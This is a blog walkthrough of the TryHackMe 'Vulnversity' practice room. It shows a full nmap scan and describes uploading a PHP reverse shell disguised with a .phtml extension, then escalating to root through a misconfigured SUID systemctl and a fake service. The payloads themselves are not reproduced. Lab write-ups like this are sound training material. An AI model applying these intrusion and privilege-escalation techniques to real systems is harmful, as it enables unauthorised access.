Tips for an Information Security Analyst/Pentester career - Ep. 84-TryHackMe
TryHackMe is an interesting website where you can legally and safely practice pentesting/hacking.
You can choose between paid and free activities in the website.
The site hosts a series of “rooms” where you can learn by following specific learning paths (e.g. Linux priv esc) or playing CTF.
Compared with Hack The Box, it's more beginner-friendly and in each room, regardless if free or premium, you can normally find community-developed write-ups if you get stuck.
Here’s the walkthrough to it.
For you to play, you need to download an .openvpn file and use it to connect to the lab network.
When this is done, you’ll be receiving an internal IP address and will be able to connect to the target machine.
INITIAL RECON: nmap -sS -sV -p- --open -T4 -vv <MACHINE IP>
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 63 vsftpd 3.0.3
22/tcp open ssh syn-ack ttl 63 OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)|
139/tcp open netbios-ssn syn-ack ttl 63 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn syn-ack ttl 63 Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
3128/tcp open http-proxy syn-ack ttl 63 Squid http proxy 3.5.12
|_http-server-header: squid/3.5.12
|_http-title: ERROR: The requested URL could not be retrieved
3333/tcp open http syn-ack ttl 63 Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: POST OPTIONS GET HEAD
|_http-title: Vuln University
No exact OS matches for host.
Uptime guess: 198.840 days (since Wed Sep 11 02:15:18 2019)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Host: VULNUNIVERSITY; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 1h20m00s, deviation: 2h18m34s, median: 0s
| nbstat: NetBIOS name: VULNUNIVERSITY, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
| VULNUNIVERSITY<00> Flags: <unique><active>
| VULNUNIVERSITY<03> Flags: <unique><active>
| VULNUNIVERSITY<20> Flags: <unique><active>
| \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
| WORKGROUP<00> Flags: <group><active>
| WORKGROUP<1d> Flags: <unique><active>
| WORKGROUP<1e> Flags: <group><active>
| Statistics:
| 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
| 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|_ 00 00 00 00 00 00 00 00 00 00 00 00 00 00
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 41203/tcp): CLEAN (Couldn't connect)
| Check 2 (port 45735/tcp): CLEAN (Couldn't connect)
| Check 3 (port 56253/udp): CLEAN (Failed to receive data)
| Check 4 (port 32651/udp): CLEAN (Failed to receive data)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: vulnuniversity
| NetBIOS computer name: VULNUNIVERSITY\x00
| Domain name: \x00
| FQDN: vulnuniversity
|_ System time: 2020-03-27T22:25:24-04:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-03-28T02:25:24
|_ start_date: N/A
TRACEROUTE (using port 445/tcp)
HOP RTT ADDRESS
1 138.04 ms 10.8.0.1
2 138.24 ms 10.10.10.202
Nmap done: 1 IP address (1 host up) scanned in 85.44 seconds
Raw packets sent: 73874 (3.254MB) | Rcvd: 73628 (2.969MB)
FINDINGS
The web server is running on port 3333.
I could find an upload directory (/internal) through the DIRSEARCH tool.
The challenge contains hints on what extensions might be allowed, but we can also gather that by using Burp Intruder.
After launching an attack through Intruder (see embedded video), we conclude phmtl extension results to be allowed.
We can then upload a reverse shell by changing its extension from php to phtml.
We then obtain a reverse shell from the target machine by browsing to the URL where the uploaded shell is stored on the webserver.
We can then upload a reverse shell by changing its extension from php to phtml.
PRIVILEGE ESCALATION
Looking for SUID FILES (through the below command), we find systemctl is available for privesc.
By following the directions found here, we can create a fake service that will return a root reverse shell on port 9000.
The privilege escalation technique leverages the fact systemctl allows to start a service. In this case, as systemctl is wrongly configured to run with the same privilege level as the root user, it’ll return a root shell when we run our fake service.
This is what the fake service looks like:
- I replaced the bash payload with a python payload (the bash shell mentioned in the original post didn't work)
- I replaced the attacking machine's IP address with my internal IP for the TryHackMe network.
I then started the service with the command below (systemctl enable /tmp/root.service).
The command creates a service called root that, once started, will send a root shell back to our machine.
To start the service we created, we run systemctl start /tmp/root command.
As a result, by opening up a netcat listener on port 9000, we receive a reverse root shell.
At that point, we can read the root flag and we can pwn the machine.
GAME OVER!!
Hope you enjoyed the walkthrough and the ride.
Stick around for more posts
Comments
Post a Comment